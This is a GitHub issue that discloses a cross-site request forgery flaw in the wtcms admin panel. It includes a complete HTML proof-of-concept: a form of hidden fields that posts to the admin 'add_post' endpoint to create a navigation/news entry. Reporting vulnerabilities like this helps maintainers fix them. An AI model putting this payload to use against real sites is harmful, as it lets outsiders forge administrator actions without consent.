Skip to content

There is one CSRF vulnerability that can add news #8

Description

@Ch3ng-sky

You can add articles in admin background, but there is a CSRF vulnerability.
clipboard
clipboard2
clipboard3
clipboard4

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/cms/wtcms-master/index.php?g=admin&m=nav&a=add_post" method="POST">
      <input type="hidden" name="cid" value="3" />
      <input type="hidden" name="parentid" value="72" />
      <input type="hidden" name="label" value="CSRF Test" />
      <input type="hidden" name="nav" value="on" />
      <input type="hidden" name="external&#95;href" value="http&#58;&#47;&#47;" />
      <input type="hidden" name="target" value="" />
      <input type="hidden" name="icon" value="" />
      <input type="hidden" name="status" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions